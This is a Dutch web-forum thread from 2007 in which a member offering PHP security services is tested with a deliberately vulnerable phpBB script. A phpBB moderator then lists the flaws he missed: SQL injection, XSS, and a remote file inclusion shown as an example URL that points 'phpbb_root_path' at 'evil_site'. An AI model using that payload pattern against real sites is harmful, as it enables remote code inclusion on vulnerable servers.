PHP veilig
-
2428 × bekeken sinds 27-12-2007, 15:44 #1
PHP veilig
Laatst aangepast door Ivo van B. : 13-09-2011 om 22:15
-
In de schijnwerper
Ervaren webdeveloper biedt zijn diensten aan voor weinig.Freelance / WerkFull Stack: Web development, Design and BrandingFreelance / WerkSenior Designster - top kwaliteit - 16 uur per week - per maand - 350 euroFreelance / WerkLaravel / Wordpress - Top kwaliteit voor een gunstig tariefFreelance / Werk -
27-12-2007, 15:46 #2
Kaboem programmeurs
- Berichten
- 969
- Lid sinds
- 19 Jaar
Heb je voorbeelden van website,s die je beveiligt hebt ?
-
27-12-2007, 15:48 #3
Ondernemer
- Berichten
- 209
- Lid sinds
- 18 Jaar
-snip-
Laatst aangepast door Ivo van B. : 13-09-2011 om 22:19
-
27-12-2007, 15:49 #4
Kaboem programmeurs
- Berichten
- 969
- Lid sinds
- 19 Jaar
ok jammer wou ff chekken of het wel echt goed is beveilig :)
Origineel gepost door Ivo van B.
-
27-12-2007, 15:52 #5
Ondernemer
- Berichten
- 209
- Lid sinds
- 18 Jaar
-snip-
Laatst aangepast door Ivo van B. : 13-09-2011 om 22:19
-
27-12-2007, 20:15 #6
Loor Media
- Berichten
- 322
- Lid sinds
- 17 Jaar
Ik heb binnekort wel intresse is een factuur mogelijk?
-
27-12-2007, 20:18 #7
Ondernemer
- Berichten
- 209
- Lid sinds
- 18 Jaar
-snip-
Laatst aangepast door Ivo van B. : 13-09-2011 om 22:19
-
28-12-2007, 10:36 #8
Particulier
- Berichten
- 153
- Lid sinds
- 19 Jaar
Ik heb mogelijk interesse, maar wens graag even een voorbeeld van je kunsten :).
Ik heb een klein scriptje gemaakt, kan je even aangeven wat er fout is: http://paulsohier.nl/sql.phps
NOTE: Het zal veel om phpBB related dingen gaan, dus daarom ook een beetje phpBB gerelateerd scriptje.
-
28-12-2007, 11:06 #9
Particulier
- Berichten
- 20
- Lid sinds
- 17 Jaar
Paul ik hoop dat hier je code er overal er niet zo is. Want dan ben je zo bankroet. Hier constateer ik nu al minimaal 3 minimale gevaren..
-
28-12-2007, 11:10 #10
Particulier
- Berichten
- 153
- Lid sinds
- 19 Jaar
Het is een test, tuurlijk script ik niet overal zo ;). Ik ben phpBB.com MOD team member, en controleer persoonlijk dagelijks MODs op veiligheidslekken. Echter heb ik momenteel een aantal projecten persoonlijk die gedaan moeten worden en waar ik zelf niet zo veel tijd voor heb. Origineel gepost door Jaap Marcus
-
28-12-2007, 11:10 #11
Particulier
- Berichten
- 606
- Lid sinds
- 18 Jaar
Hoi Ivo, eind januari komt GPmanager.com online. We zijn nu bezig met de ontwikkeling. Vooral bij zo`n managergame is de beveiliging van groot belang. Ik zal dan even contact met je opnemen. Ben je dan nog beschikbaar?
-
29-12-2007, 01:38 #12
Ondernemer
- Berichten
- 209
- Lid sinds
- 18 Jaar
-snip-
Laatst aangepast door Ivo van B. : 13-09-2011 om 22:19
-
29-12-2007, 09:58 #13
Particulier
- Berichten
- 153
- Lid sinds
- 19 Jaar
Sorry, geen interesse.
Het maakt niet uit of je haakjes gebruikt bij require of niet, het mag allebei. Zelf prefereer ik met vanwege de leesbaarheid.
Verder is $HTTP_GET_VARS in phpBB2 verplicht, en ik veel daarmee werk is dat hier gebruikt.
Verder heb je 2 lekken gemist.
Wanneer register globals aanstaat kan je dmv $phpbb_root_path RFI gebruiken, http://www.site.com/file.php?phpbb_root_path=evil_site
Als laaste zat er dmv de niet gecaste integer XSS in de error message.
Dit was een zeer basaal script, en 1/3 van het resultaat is helaas te slecht voor mij persoonlijk.
-
29-12-2007, 11:06 #14
Particulier
- Berichten
- 153
- Lid sinds
- 19 Jaar
Dit script is zo ontzettend simpel, dat als je de fouten hierin niet ziet je het niet helemaal weet waarover je hebt. Die RFI is zo duidelijk, dat diegelijk opvalt. Zelfde geld voor sql injection, en voor XSS. Als je dit script moet testen om te kijken of niet goed is, heb ik absoluut geen interesse.
-
29-12-2007, 11:08 #15
Ondernemer
- Berichten
- 209
- Lid sinds
- 18 Jaar
-snip-
Laatst aangepast door Ivo van B. : 13-09-2011 om 22:19
